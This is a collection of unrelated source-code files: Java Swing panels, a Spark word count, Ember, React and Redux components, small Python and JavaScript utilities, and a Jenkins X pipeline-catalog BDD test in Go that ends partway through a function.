    Dimension sizeTitle = new Dimension(200, 70);
    headlineLabel.setFont(ViewProperties.SUBHEADLINE_FONT);
    headlineLabel.setMaximumSize(sizeTitle);
    gridPanel.add(headlineLabel);
    gridPanel.add(refresh);
    gridPanel.setMaximumSize(new Dimension(ViewProperties.DEFAULT_WIDTH / 2 - 6, 50));
    this.rightSide.add(gridPanel);
    this.rightSide.add(Box.createVerticalStrut(5));
    // Initial fill of the document list (initialize() refreshes it later).
    this.tableData = this.sessionStorage.getLobby().getDocumentIds().stream().sorted().toArray(String[]::new);
    this.documentTable = new JList<>(tableData);
    this.documentTable.setVisible(true);
    this.documentTable.addMouseListener(new MouseAdapter() {
        @Override
        public void mouseClicked(MouseEvent evt) {
            JList<?> list = (JList<?>) evt.getSource();
            // Double-click joins the selected document directly.
            if (evt.getClickCount() == 2) {
                MenuPanel.this.documentNameField.setText((String) list.getSelectedValue());
                MenuPanel.this.joinDocument();
            }
        }
    });
    this.documentTable.setFont(ViewProperties.EDITOR_FONT);
    this.tablePane = new JScrollPane(this.documentTable);
    this.tablePane.setVisible(true);
    this.rightSide.add(this.tablePane);
}
/**
 * Creates the panel skeleton: a headline on top and a body split into
 * equally sized left (document entry) and right (document list) halves.
 */
private void createGrid() {
    JPanel headline = new TypeTogetherPanel();
    this.add(headline);
    headline.setVisible(true);
    headline.setBorder(BorderFactory.createEmptyBorder());
    JPanel body = new JPanel();
    BorderLayout layout = new BorderLayout();
    body.setLayout(layout);
    body.setVisible(true);
    body.setBorder(BorderFactory.createEmptyBorder());
    this.add(body);
    this.leftSide = new JPanel();
    // Each half takes (almost) half the window width below the headline.
    Dimension size = new Dimension(ViewProperties.DEFAULT_WIDTH / 2 - 6, ViewProperties.DEFAULT_HEIGHT - ViewProperties.HEADLINE_HEIGHT);
    this.leftSide.setSize(size);
    this.leftSide.setPreferredSize(size);
    this.leftSide.setVisible(true);
    this.leftSide.setBorder(BorderFactory.createEmptyBorder());
    this.leftSide.setBackground(ViewProperties.BACKGROUND_COLOR);
    body.add(this.leftSide, BorderLayout.WEST);
    this.rightSide = new JPanel();
    this.rightSide.setSize(size);
    this.rightSide.setPreferredSize(size);
    this.rightSide.setVisible(true);
    this.rightSide.setBorder(BorderFactory.createEmptyBorder());
    this.rightSide.setBackground(ViewProperties.BACKGROUND_COLOR);
    body.add(this.rightSide, BorderLayout.EAST);
}
/**
 * Builds the left half of the menu: a label and text field for the document
 * name, the create/join button row, and the username label at the bottom.
 */
private void createLeftSide() {
    BoxLayout layout = new BoxLayout(this.leftSide, BoxLayout.Y_AXIS);
    this.leftSide.setLayout(layout);
    // Two consecutive struts (150 + 100) push the content 250px down.
    this.leftSide.add(Box.createVerticalStrut(150));
    this.leftSide.add(Box.createVerticalStrut(100));
    JLabel documentTitle = new JLabel("Name des Dokuments");
    Dimension sizeTitle = new Dimension(500, 70);
    documentTitle.setOpaque(true);
    documentTitle.setMaximumSize(sizeTitle);
    documentTitle.setHorizontalTextPosition(SwingConstants.LEFT);
    documentTitle.setFont(ViewProperties.SUBHEADLINE_FONT);
    documentTitle.setForeground(ViewProperties.FONT_COLOR);
    documentTitle.setBackground(ViewProperties.BACKGROUND_COLOR);
    documentTitle.setAlignmentX(CENTER_ALIGNMENT);
    this.leftSide.add(documentTitle);
    this.documentNameField = new JTextField(2);
    this.documentNameField.setForeground(ViewProperties.FONT_COLOR);
    this.documentNameField.setSize(500, 40);
    this.documentNameField.setMaximumSize(new Dimension(500, 40));
    this.documentNameField.setFont(ViewProperties.EDITOR_FONT);
    this.documentNameField.setBorder(BorderFactory.createLineBorder(ViewProperties.FONT_COLOR, 1));
    this.leftSide.add(this.documentNameField);
    this.leftSide.add(Box.createRigidArea(new Dimension(500, 15)));
    this.leftSide.add(this.createButtons(new Dimension(500, 50)));
    this.leftSide.add(Box.createRigidArea(new Dimension(500, 70)));
    // Username label text is set by setUser(...) when a user is bound.
    this.username = new JLabel();
    this.username.setOpaque(true);
    this.username.setMaximumSize(new Dimension(500, 40));
    this.username.setBackground(ViewProperties.BACKGROUND_COLOR);
    this.username.setForeground(ViewProperties.FONT_COLOR);
    this.username.setFont(ViewProperties.SUBHEADLINE_FONT);
    this.username.setHorizontalTextPosition(SwingConstants.LEFT);
    this.username.setAlignmentX(CENTER_ALIGNMENT);
    this.leftSide.add(username);
}
/**
 * Builds the "Erstellen" / "Beitreten" button row shown below the
 * document-name field.
 *
 * @param panelSize fixed size of the surrounding button panel
 * @return panel containing both action buttons
 */
private JPanel createButtons(Dimension panelSize) {
    JPanel buttons = new JPanel();
    buttons.setVisible(true);
    buttons.setBackground(ViewProperties.BACKGROUND_COLOR);
    buttons.setMaximumSize(panelSize);
    buttons.setPreferredSize(panelSize);
    buttons.setMinimumSize(panelSize);
    buttons.setSize(panelSize);
    FlowLayout flowLayout = new FlowLayout();
    flowLayout.setVgap(0);
    flowLayout.setHgap(0);
    flowLayout.setAlignment(FlowLayout.LEFT);
    buttons.setLayout(flowLayout);
    Dimension buttonSize = new Dimension(150, 50);
    buttons.add(this.createMenuButton("Erstellen", buttonSize, this::createDocument));
    buttons.add(Box.createHorizontalStrut(200));
    buttons.add(this.createMenuButton("Beitreten", buttonSize, this::joinDocument));
    return buttons;
}

/**
 * Creates one uniformly styled action button; both menu buttons shared this
 * exact nine-call configuration, so it is factored out here.
 *
 * @param label   button caption
 * @param size    fixed button size
 * @param onClick action executed when the button is pressed
 * @return the configured button
 */
private JButton createMenuButton(String label, Dimension size, Runnable onClick) {
    JButton button = new JButton(label);
    button.setFont(ViewProperties.SUBHEADLINE_FONT);
    button.setForeground(ViewProperties.BACKGROUND_COLOR);
    button.setBackground(ViewProperties.CONTRAST_COLOR);
    button.setMinimumSize(size);
    button.setMaximumSize(size);
    button.setPreferredSize(size);
    button.setSize(size);
    button.setBorder(BorderFactory.createEmptyBorder());
    button.addActionListener(a -> onClick.run());
    return button;
}
// Listener callback: the session's current user changed; rebind the panel to it.
private void currentUserChanged(PropertyChangeEvent propertyChangeEvent) {
    setUser((ClientUser) propertyChangeEvent.getNewValue());
}
/**
 * Rebinds this panel to a new user: detaches the change listener from the
 * previous user (if any), attaches it to the new one and refreshes the
 * displayed username label. Passing null simply detaches.
 */
private void setUser(ClientUser newUser) {
    if (this.user != null) {
        this.user.removePropertyChangeListener(this.propertyChangeManager);
    }
    this.user = newUser;
    if (this.user != null) {
        this.user.addPropertyChangeListener(this.propertyChangeManager);
        this.username.setText(" Benutzername: "+ this.user.getName());
    }
}
/**
 * Creates a new shared document named after the text field's content and,
 * on success, immediately joins it. Shows a warning dialog for a blank name
 * and an error dialog if the document already exists.
 */
private void createDocument() {
    String documentName = this.documentNameField.getText();
    this.logger.info(String.format("Trying to create Document %s from gui", documentName));
    if (documentName.isBlank()) {
        this.window.alert("Geben Sie einen Dokumentnamen ein!", JOptionPane.WARNING_MESSAGE);
        return;
    }
    try {
        this.sessionStorage.getLobby().createDocument(documentName);
    } catch (InvalidDocumentIdException.DocumentAlreadyExistsException e) {
        ExceptionHandler.getExceptionHandler().handle(e, Level.INFO, "Document already exists.", MenuPanel.class);
        this.window.alert("Document already exists!", JOptionPane.ERROR_MESSAGE);
        return;
    }
    // Creation succeeded: reuse the join flow to open the editor.
    this.joinDocument();
}
/**
 * Joins the document named in the text field: wires a fresh LocalDocument to
 * the current user, stores the shared document in the session, switches to
 * the editor view, then registers the user with the lobby. Shows a warning
 * for a blank name and an error dialog if the document does not exist.
 */
private void joinDocument() {
    String documentName = this.documentNameField.getText();
    this.logger.info(String.format("Trying to join Document %s from gui", documentName));
    if (documentName.isBlank()) {
        this.window.alert("Geben Sie einen Dokumentnamen ein!", JOptionPane.WARNING_MESSAGE);
        return;
    }
    try {
        Document document = this.lobby.getDocumentById(documentName);
        LocalDocument localDocument = new LocalDocument();
        this.sessionStorage.getCurrentUser().setDocument(localDocument);
        this.sessionStorage.setCurrentSharedDocument(document);
        this.window.switchToView(ViewProperties.EDITOR);
        this.lobby.joinDocument(this.sessionStorage.getCurrentUser(), documentName);
    } catch (InvalidDocumentIdException.DocumentDoesNotExistException e) {
        ExceptionHandler.getExceptionHandler().handle(e, Level.INFO, "Could not join document.", MenuPanel.class);
        this.window.alert("Document " + documentName + " does not exist!", JOptionPane.ERROR_MESSAGE);
    }
}
// Rebuilds the panel when a refresh is requested.
private void onRefresh() {
    this.initialize();
}
}
|
<gh_stars>0
package com.spark.itversity.example
import org.apache.spark.SparkContext
import org.apache.spark.SparkContext._
import org.apache.spark.SparkConf
/**
 * Minimal Spark word-count example: reads a local text file, splits each row
 * on spaces and prints every (word, count) pair.
 *
 * @author ollopollo
 */
object simpleSpark {
  def main(args : Array[String]){
    val conf = new SparkConf().setAppName("Simple Application").setMaster("local[2]").set("spark.executor.memory", "1g")
    val sc = new SparkContext(conf)
    try {
      val myFile = sc.textFile("C:\\streaming\\newFile.txt")
      // Classic word count: tokenize, map each word to (word, 1), sum per key.
      val wordspair = myFile.flatMap(row => row.split(" ")).map(x => (x, 1)).reduceByKey(_ + _)
      // NOTE: foreach(println) prints on the driver only because the master is local.
      wordspair.foreach(println)
    } finally {
      // Release the SparkContext; the original implementation leaked it on exit.
      sc.stop()
    }
  }
}
|
import Component from '@ember/component';
import { inject as service } from '@ember/service';
import { computed } from '@ember/object';
import templateString from 'ember-emojione/-private/cp-macros/template-string';
// Skin-tone selector button for the emoji picker. Rendered as a <button>
// whose CSS classes reflect the tone it represents and whether that tone is
// the currently selected one.
export default Component.extend({
  // The skin tone this button represents; supplied by the parent template.
  tone: undefined,

  // Closure action invoked with the new tone after a successful selection.
  toneSelectAction: () => {},

  emojiService: service('emoji'),

  tagName: 'button',
  classNameBindings: [':eeo-emojiPicker-tone', 'isCurrentClass', 'toneClass'],

  // Adds the `-current` class when this button's tone is the active one.
  isCurrentClass: computed('tone', 'emojiService.currentSkinTone', function () {
    return this.get('tone') === this.get('emojiService.currentSkinTone')
      ? '-current'
      : '';
  }),

  // Interpolates the tone into a per-tone CSS class (presumably e.g. "_3" —
  // confirm against the templateString macro).
  toneClass: templateString("_${tone}"),

  // Selecting the already-active tone is a no-op; otherwise persist the
  // choice on the service and notify the parent.
  click() {
    const oldSkinTone = this.get('emojiService.currentSkinTone');
    const newSkinTone = this.get('tone');
    if (oldSkinTone === newSkinTone) return;
    this.set('emojiService.currentSkinTone', newSkinTone);
    this.toneSelectAction(newSkinTone);
  }
});
|
<filename>src/main/java/de/unistuttgart/ims/coref/annotator/SearchAnnotationPanel.java
package de.unistuttgart.ims.coref.annotator;
import java.awt.BorderLayout;
import java.awt.event.ActionEvent;
import java.awt.event.WindowListener;
import javax.swing.AbstractAction;
import javax.swing.Action;
import javax.swing.ButtonGroup;
import javax.swing.JButton;
import javax.swing.JLabel;
import javax.swing.JList;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JToggleButton;
import javax.swing.ListSelectionModel;
import javax.swing.event.ListSelectionEvent;
import javax.swing.event.ListSelectionListener;
import javax.swing.text.BadLocationException;
import javax.swing.tree.TreePath;
import org.apache.uima.fit.util.JCasUtil;
import org.apache.uima.jcas.JCas;
import org.eclipse.collections.api.list.MutableList;
import org.eclipse.collections.impl.factory.Lists;
import org.kordamp.ikonli.Ikon;
import org.kordamp.ikonli.materialdesign.MaterialDesign;
import de.unistuttgart.ims.coref.annotator.action.IkonAction;
import de.unistuttgart.ims.coref.annotator.api.v1.Flag;
import de.unistuttgart.ims.coref.annotator.api.v1.Mention;
/**
 * Panel for searching annotated mentions: offers one toggle button per
 * mention-level flag; pressing one lists all mentions carrying that flag and
 * highlights each of them in the document text.
 */
public class SearchAnnotationPanel extends SearchPanel<SearchResultMention> implements WindowListener {

	/**
	 * Action that collects all mentions carrying a given flag, fills the
	 * result list model and highlights every hit in the text.
	 */
	class SearchFlaggedMentions extends IkonAction {

		private static final long serialVersionUID = 1L;

		// Key of the flag to search for.
		String flag;

		public SearchFlaggedMentions(String s, String key, Ikon ik) {
			super(key, ik);
			this.flag = s;
		}

		@Override
		public void actionPerformed(ActionEvent e) {
			clearResults();
			JCas jcas = searchContainer.getDocumentWindow().getDocumentModel().getJcas();
			for (Mention m : JCasUtil.select(jcas, Mention.class)) {
				if (Util.isX(m, flag)) {
					listModel.addElement(new SearchResultMention(searchContainer, m));
					try {
						highlights.add(hilit.addHighlight(m.getBegin(), m.getEnd(), painter));
					} catch (BadLocationException e1) {
						e1.printStackTrace();
					}
				}
			}
			updateLabel();
			searchContainer.pack();
		}
	}

	/**
	 * Synchronises the result list with the annotation tree: selecting a
	 * search result selects and scrolls to the corresponding mention.
	 */
	class StructuredSearchResultListSelectionListener implements ListSelectionListener {

		@Override
		public void valueChanged(ListSelectionEvent e) {
			if (e.getValueIsAdjusting())
				return;
			int index = text_list.getSelectedIndex();
			SearchResultMention sr;
			try {
				sr = listModel.get(index);
			} catch (ArrayIndexOutOfBoundsException ex) {
				// No valid selection (e.g. after the results were cleared).
				return;
			}
			Mention m = sr.getMention();
			Object[] path = searchContainer.getDocumentWindow().getDocumentModel().getTreeModel().getPathToRoot(m);
			TreePath tp = new TreePath(path);
			searchContainer.getDocumentWindow().getTree().setSelectionPath(tp);
			searchContainer.getDocumentWindow().getTree().scrollPathToVisible(tp);
		}
	}

	private static final long serialVersionUID = 1L;

	// List showing the current search results.
	JList<SearchResultMention> text_list;
	JLabel selectedEntityLabel = new JLabel();
	// NOTE(review): not referenced within this class — possibly read by the
	// superclass; confirm before removing.
	int limit = 1000;
	// One toggle button per searchable mention flag; deselected in clearEvent().
	MutableList<JToggleButton> toggleButtons = Lists.mutable.empty();

	public SearchAnnotationPanel(SearchContainer sd) {
		super(sd);

		JPanel bar = new JPanel();
		// bar.setFloatable(false);
		ButtonGroup bg = new ButtonGroup();
		// One toggle button for every flag whose target class is Mention.
		for (Flag flag : sd.getDocumentWindow().getDocumentModel().getFlagModel().getFlags()) {
			if (flag.getTargetClass().equalsIgnoreCase(Mention.class.getName())) {
				AbstractAction action = new SearchFlaggedMentions(flag.getKey(), flag.getLabel(),
						MaterialDesign.valueOf(flag.getIcon()));
				JToggleButton b = new JToggleButton(action);
				bg.add(b);
				bar.add(b);
				toggleButtons.add(b);
			}
		}
		bar.add(new JButton(clearFindings));

		JPanel searchPanel = new JPanel();
		searchPanel.add(bar);

		text_list = new JList<SearchResultMention>(listModel);
		text_list.getSelectionModel().addListSelectionListener(new StructuredSearchResultListSelectionListener());
		text_list.getSelectionModel().setSelectionMode(ListSelectionModel.SINGLE_SELECTION);
		text_list.setCellRenderer(
				new SearchResultRenderer<SearchResult>(searchContainer.getText(), searchContainer.getContexts()));
		text_list.setVisibleRowCount(10);
		text_list.setDragEnabled(false);
		JScrollPane listScroller = new JScrollPane(text_list);

		setLayout(new BorderLayout());
		add(searchPanel, BorderLayout.NORTH);
		add(listScroller, BorderLayout.CENTER);
		add(searchResultsLabel, BorderLayout.SOUTH);
	}

	@Override
	public void clearEvent() {
		// Deselect all flag toggle buttons when the results are cleared.
		toggleButtons.forEach(tb -> tb.getAction().putValue(Action.SELECTED_KEY, Boolean.FALSE));
	}
}
|
<reponame>aizatto/timestamp-js
import React from "react";
import "./App.css";
import { Menu } from "./components/menu";
import { Page } from "./components/page";
// Root component: renders the application menu alongside the main page.
function App() {
  return (
    <div className="App">
      <Menu />
      <Page />
    </div>
  );
}

export default App;
|
<reponame>harsa/basilisk-react-native
import firebase from "react-native-firebase";
// Redux Store Configuration
import { createStore, applyMiddleware } from 'redux';
import thunk from 'redux-thunk';
import rootReducer from '../reducers/root';
import loggingMiddleware from './middleware/logging';
// Builds the Redux store with thunk (async actions) and logging middleware.
// The Firebase middleware is currently disabled (see the commented line).
const configureStore = () => {
  //const middleware = applyMiddleware(thunk, loggingMiddleware, firMiddleware(firebase));
  const middleware = applyMiddleware(thunk, loggingMiddleware);
  return createStore(rootReducer, middleware);
};

// Single shared store instance for the whole app.
const store = configureStore()

export default store;
|
def sum_square_odd_numbers(a, b):
    """Return the sum of squares of all odd integers in the inclusive range [a, b].

    Args:
        a: Lower bound of the range (inclusive).
        b: Upper bound of the range (inclusive).

    Returns:
        The sum of i**2 for every odd i with a <= i <= b; 0 when the range
        is empty (a > b) or contains no odd numbers.
    """
    # Generator expression avoids shadowing the built-in `sum`, which the
    # original implementation used as a local variable name.
    return sum(i * i for i in range(a, b + 1) if i % 2 != 0)
|
<reponame>zouvier/BlockChain-Voting
/// <reference types="node" />
import { RunState } from './../interpreter';
/**
 * Adjusts gas usage and refunds of SStore ops per EIP-2200 (Istanbul)
 *
 * @param {RunState} runState
 * @param {any} found
 * @param {Buffer} value
 * @param {Buffer} key presumably the storage slot key being written — the
 *   original doc omitted this parameter; confirm against the implementation
 */
export declare function updateSstoreGasEIP2200(runState: RunState, found: any, value: Buffer, key: Buffer): void;
|
import requests
from bs4 import BeautifulSoup
def fetch_top_result(keyword):
    """Fetch the URL of the first Google search result for ``keyword``.

    Args:
        keyword: Search phrase; words are joined with '+' into the query.

    Returns:
        The href of the first result link, or None when the expected result
        markup is absent (Google frequently changes its HTML and may serve
        different markup to non-browser clients).

    Raises:
        requests.HTTPError: if the search request returns an error status.

    NOTE(review): scraping Google HTML is brittle and may violate its ToS;
    consider the official Custom Search API instead.
    """
    query = "+".join(keyword.split(" "))
    url = f"https://www.google.com/search?q={query}"
    page = requests.get(url, timeout=10)
    # Fail loudly on HTTP errors instead of parsing an error page.
    page.raise_for_status()
    soup = BeautifulSoup(page.content, "html.parser")
    # The original chained .find(...).find("a") and crashed with
    # AttributeError whenever the "r" container was absent.
    container = soup.find("div", {"class": "r"})
    if container is None:
        return None
    anchor = container.find("a")
    if anchor is None:
        return None
    return anchor.get("href")
|
def processInputFile(inputFileName, outputFileName, classId, cssId):
    """Copy inputFileName to outputFileName, inlining referenced assets.

    Lines containing ``classId`` are replaced by the inlined script file they
    reference, lines containing ``cssId`` by the inlined stylesheet; every
    other line is copied through unchanged.
    """
    with open(inputFileName, 'r', encoding='utf-8') as source, \
            open(outputFileName, 'w', encoding='utf-8') as target:
        for currentLine in source:
            if classId in currentLine:
                pasteScript(currentLine, target)
            elif cssId in currentLine:
                pasteCSS(currentLine, target)
            else:
                target.write(currentLine)
def pasteScript(line, outputFile):
    """Inline the script file referenced on ``line`` into outputFile.

    The filename is taken from the second-to-last double-quoted segment of
    the line (e.g. a src="..." attribute); its contents are written wrapped
    in a <script> element.
    """
    scriptPath = line.split('"')[-2]
    with open(scriptPath, 'r', encoding='utf-8') as script:
        outputFile.write("<script>\n")
        outputFile.writelines(script)
        outputFile.write("</script>\n")
def pasteCSS(line, outputFile):
filename = line.split('"')[-2]
with open(filename, 'r', encoding='utf-8') as importFile:
outputFile.write("<style>\n")
for importedLine in importFile:
outputFile.write(importedLine)
outputFile.write("</style>\n")
# Example usage
# NOTE(review): runs at import time and requires input.html (plus any files
# it references) to exist in the working directory — confirm this is intended.
processInputFile('input.html', 'output.html', 'class123', 'css456')
|
// REST endpoints used by the client.
// NOTE(review): the bank/validator hosts are hard-coded private/LAN
// addresses — consider environment-based configuration.
export const BANK_ENDPOINT = 'http://192.168.3.112/banks?limit=30&offset=0';
// Free batch IP-geolocation service.
export const IPAPI_ENDPOINT = 'http://ip-api.com/batch/';
export const VALIDATOR_ENDPOINT = 'http://192.168.127.12/validators?limit=30&offset=0';
|
<reponame>dougrich/oauth-aggregator
/**
 * Creates an Express application and lets every plugin register itself on it.
 *
 * @param {Array} plugins - objects exposing a bootstrap(config, app) hook
 * @param {Object} config - configuration passed through to each plugin
 * @param {Function} [express] - injectable Express factory (useful in tests)
 * @returns the configured Express application
 */
function bootstrap(
  plugins,
  config,
  express = require('express')
) {
  const app = express()
  plugins.forEach(plugin => plugin.bootstrap(config, app))
  return app
}

module.exports = bootstrap
|
// Returns a new array containing only the elements of `arr` whose
// `property` field strictly equals `value`.
function filterByProperty(arr, property, value) {
  return arr.filter(item => item[property] === value);
}
const furniture = filterByProperty(products, 'type', 'furniture');
|
<reponame>getkuby/kube-dsl
# Lazily-loaded DSL classes for the Kubernetes batch/v2alpha1 API group.
# Each constant is autoloaded from its file on first reference.
module KubeDSL::DSL::Batch::V2alpha1
  autoload :CronJob, 'kube-dsl/dsl/batch/v2alpha1/cron_job'
  autoload :CronJobList, 'kube-dsl/dsl/batch/v2alpha1/cron_job_list'
  autoload :CronJobSpec, 'kube-dsl/dsl/batch/v2alpha1/cron_job_spec'
  autoload :CronJobStatus, 'kube-dsl/dsl/batch/v2alpha1/cron_job_status'
  autoload :JobTemplateSpec, 'kube-dsl/dsl/batch/v2alpha1/job_template_spec'
end
|
<reponame>yelhouti/jx3-pipeline-catalog
package tests
import (
"context"
"crypto/tls"
"fmt"
"net/http"
"os"
"path/filepath"
"strconv"
"strings"
"testing"
"time"
"github.com/jenkins-x/go-scm/scm"
v1 "github.com/jenkins-x/jx-api/v3/pkg/apis/jenkins.io/v1"
"github.com/jenkins-x/jx-api/v3/pkg/client/clientset/versioned"
"github.com/jenkins-x/jx-application/pkg/applications"
"github.com/jenkins-x/jx-helpers/v3/pkg/cmdrunner"
"github.com/jenkins-x/jx-helpers/v3/pkg/gitclient"
"github.com/jenkins-x/jx-helpers/v3/pkg/gitclient/cli"
"github.com/jenkins-x/jx-helpers/v3/pkg/gitclient/giturl"
"github.com/jenkins-x/jx-helpers/v3/pkg/kube"
"github.com/jenkins-x/jx-helpers/v3/pkg/kube/jobs"
"github.com/jenkins-x/jx-helpers/v3/pkg/kube/jxclient"
"github.com/jenkins-x/jx-helpers/v3/pkg/kube/naming"
"github.com/jenkins-x/jx-helpers/v3/pkg/scmhelpers"
"github.com/jenkins-x/jx-helpers/v3/pkg/stringhelpers"
"github.com/jenkins-x/jx-helpers/v3/pkg/termcolor"
"github.com/jenkins-x/jx-promote/pkg/environments"
"github.com/pkg/errors"
"github.com/stretchr/testify/require"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
)
var (
	// info colors user-facing log messages.
	info = termcolor.ColorInfo

	// removePaths are the generated files removed from the test repository
	// before regenerating them from the pipeline catalog under test.
	removePaths = []string{".lighthouse", "jenkins-x.yml", "charts", "preview", "Dockerfile"}
)
// TestPipelineCatalogWorksOnTestRepository runs the full BDD flow against the
// repository named by $JOB_NAME: raise a PR with the regenerated pipeline
// catalog, wait for it to merge, verify the preview environment, then follow
// the release and promotion pipelines through to Staging.
func TestPipelineCatalogWorksOnTestRepository(t *testing.T) {
	repoName := os.Getenv("JOB_NAME")
	require.NotEmpty(t, repoName, "no $JOB_NAME defined")

	packDir, err := filepath.Abs("../../../packs")
	require.NoError(t, err, "failed to find pack dir")
	t.Logf("using packs dir %s", packDir)

	o := &Options{
		T:                      t,
		Repository:             repoName,
		PackDir:                packDir,
		PullRequestPollTimeout: 20 * time.Minute,
		PullRequestPollPeriod:  time.Minute,
		ReleasePollTimeout:     20 * time.Minute,
		ReleasePollPeriod:      10 * time.Second,
		InsecureURLSkipVerify:  true,
	}
	o.Run()
}
// Options holds the configuration, timeouts and lazily-created clients for a
// single pipeline-catalog BDD test run. Zero-valued fields are defaulted in
// Validate.
type Options struct {
	T *testing.T

	// Git coordinates of the repository under test.
	Owner      string
	Repository string
	GitURL     string

	// PackDir is the local pipeline catalog packs directory to test.
	PackDir string

	Namespace  string
	MainBranch string

	// ReleaseBuildNumber and MergeSHA are populated as the test runs.
	ReleaseBuildNumber string
	MergeSHA           string

	GitOperatorNamespace string

	// InsecureURLSkipVerify disables TLS certificate checks for app URLs.
	InsecureURLSkipVerify bool
	Verbose               bool

	GitClient     gitclient.Interface
	CommandRunner cmdrunner.CommandRunner
	ScmFactory    scmhelpers.Factory

	// Polling timeouts/periods for pull requests and releases.
	PullRequestPollTimeout time.Duration
	PullRequestPollPeriod  time.Duration
	ReleasePollTimeout     time.Duration
	ReleasePollPeriod      time.Duration

	KubeClient kubernetes.Interface
	JXClient   versioned.Interface
}
// Validate verifies we can lazily create the various clients
// and defaults any unset configuration fields.
func (o *Options) Validate() {
	if o.GitOperatorNamespace == "" {
		o.GitOperatorNamespace = "jx-git-operator"
	}
	if o.MainBranch == "" {
		o.MainBranch = "master"
	}
	if o.Owner == "" {
		o.Owner = "jenkins-x-labs-bdd-tests"
	}
	if o.ScmFactory.GitServerURL == "" {
		o.ScmFactory.GitServerURL = giturl.GitHubURL
	}
	if o.GitURL == "" {
		// Derive the clone URL from server/owner/repository.
		o.GitURL = stringhelpers.UrlJoin(o.ScmFactory.GitServerURL, o.Owner, o.Repository)
	}
	var err error
	if o.CommandRunner == nil {
		o.CommandRunner = cmdrunner.QuietCommandRunner
	}
	if o.GitClient == nil {
		o.GitClient = cli.NewCLIClient("", o.CommandRunner)
	}
	if o.ScmFactory.ScmClient == nil {
		_, err = o.ScmFactory.Create()
		require.NoError(o.T, err, "failed to create ScmClient")
	}
	o.JXClient, o.Namespace, err = jxclient.LazyCreateJXClientAndNamespace(o.JXClient, o.Namespace)
	require.NoError(o.T, err, "failed to create the jx client")
	o.KubeClient, err = kube.LazyCreateKubeClient(o.KubeClient)
	require.NoError(o.T, err, "failed to create the kube client")
}
// Run runs the test suite
func (o *Options) Run() {
	o.Validate()

	// Raise the catalog-regeneration PR, and predict the release build number
	// before the merge triggers that pipeline.
	pr := o.CreatePullRequest()
	buildNumber := o.findNextBuildNumber()
	o.waitForPullRequestToMerge(pr)
	o.verifyPreviewEnvironment(pr)
	releasePA := o.waitForReleasePipelineToComplete(buildNumber)
	o.waitForPromotePullRequestToMerge(releasePA)
}
// CreatePullRequest creates the pull request with the new build pack:
// it clones the repository, removes the previously generated files and
// regenerates them via `jx project import` from PackDir.
func (o *Options) CreatePullRequest() *scm.PullRequest {
	t := o.T
	pro := &environments.EnvironmentPullRequestOptions{
		ScmClientFactory:  o.ScmFactory,
		Gitter:            o.GitClient,
		CommandRunner:     o.CommandRunner,
		GitKind:           o.ScmFactory.GitKind,
		OutDir:            "",
		BranchName:        "",
		PullRequestNumber: 0,
		CommitTitle:       "fix: test out pipeline catalog changes",
		CommitMessage:     "",
		ScmClient:         o.ScmFactory.ScmClient,
		BatchMode:         true,
		UseGitHubOAuth:    false,
		Fork:              false,
	}
	// Invoked inside the clone to modify the working tree before the PR is raised.
	pro.Function = func() error {
		dir := pro.OutDir
		o.Infof("cloned to git dir %s", dir)
		// Remove all previously generated pipeline files so the import
		// regenerates them from scratch.
		for _, p := range removePaths {
			path := filepath.Join(dir, p)
			err := os.RemoveAll(path)
			if err != nil {
				return errors.Wrapf(err, "failed to remove %s", path)
			}
			o.Debugf("removed %s\n", path)
		}
		c := &cmdrunner.Command{
			Dir:  dir,
			Name: "jx",
			Args: []string{"project", "import", "--dry-run", "--batch-mode", "--pipeline-catalog-dir", o.PackDir},
		}
		out, err := o.CommandRunner(c)
		o.Infof(out)
		if err != nil {
			return errors.Wrapf(err, "failed to run %s", c.CLI())
		}
		t.Logf("regenerated the pipeline catalog in dir %s", dir)
		return nil
	}
	prDetails := &scm.PullRequest{}
	pr, err := pro.Create(o.GitURL, "", prDetails, true)
	require.NoError(t, err, "failed to create Pull Request on git repository %s", o.GitURL)
	require.NotNil(t, pr, "no PullRequest returned for repository %s", o.GitURL)
	prURL := pr.Link
	t.Logf("created Pull Request: %s", info(prURL))
	return pr
}
// PollLoop polls fn every pollPeriod until fn returns true, fn returns an
// error, or pollTimeout elapses. message describes what is being waited for
// and appears in the progress log and the timeout error.
func (o *Options) PollLoop(pollTimeout, pollPeriod time.Duration, message string, fn func(elapsed time.Duration) (bool, error)) error {
	start := time.Now()
	end := start.Add(pollTimeout)
	durationString := pollTimeout.String()
	o.Infof("Waiting up to %s with poll period %s for %s...", durationString, pollPeriod.String(), message)
	for {
		// time.Since is the idiomatic form of time.Now().Sub(start).
		elapsed := time.Since(start)
		flag, err := fn(elapsed)
		if err != nil {
			return errors.Wrapf(err, "failed to invoke function")
		}
		if flag {
			return nil
		}
		if time.Now().After(end) {
			return fmt.Errorf("Timed out waiting for %s. Waited %s", message, durationString)
		}
		time.Sleep(pollPeriod)
	}
}
// Debugf logs a formatted debug message, but only when Verbose is enabled.
func (o *Options) Debugf(message string, args ...interface{}) {
	if o.Verbose {
		o.Infof("DEBUG: "+message, args...)
	}
}
// Infof logs a formatted informational message via the test logger.
func (o *Options) Infof(message string, args ...interface{}) {
	o.T.Logf(message+"\n", args...)
}
// Warnf logs a formatted warning message.
func (o *Options) Warnf(message string, args ...interface{}) {
	o.Infof("WARN: "+message, args...)
}
// ActivitySelector returns the PipelineActivity label selector matching this
// owner/repository and the given branch.
func (o *Options) ActivitySelector(branch string) string {
	return "owner=" + naming.ToValidName(o.Owner) + ",repository=" + naming.ToValidName(o.Repository) + ",branch=" + naming.ToValidValue(branch)
}
// PromoteSelector returns the lighthouse label selector matching promote
// pipelines for the given repository and branch. (The original comment was
// copy-pasted from ActivitySelector.)
func (o *Options) PromoteSelector(repository *scm.Repository, branch string) string {
	return "lighthouse.jenkins-x.io/refs.org=" + naming.ToValidName(repository.Namespace) + ",lighthouse.jenkins-x.io/refs.repo=" + naming.ToValidName(repository.Name) + ",lighthouse.jenkins-x.io/branch=" + naming.ToValidValue(branch)
}
// findNextBuildNumber predicts the build number of the release pipeline the
// upcoming merge to the main branch will trigger (latest build + 1) and
// records it in ReleaseBuildNumber.
func (o *Options) findNextBuildNumber() string {
	t := o.T
	_, buildNumber, _, err := o.getLatestPipelineActivity(o.MainBranch)
	require.NoError(t, err, "failed to find latest PipelineActivity for branch %s", o.MainBranch)
	buildNumber++
	o.ReleaseBuildNumber = strconv.Itoa(buildNumber)
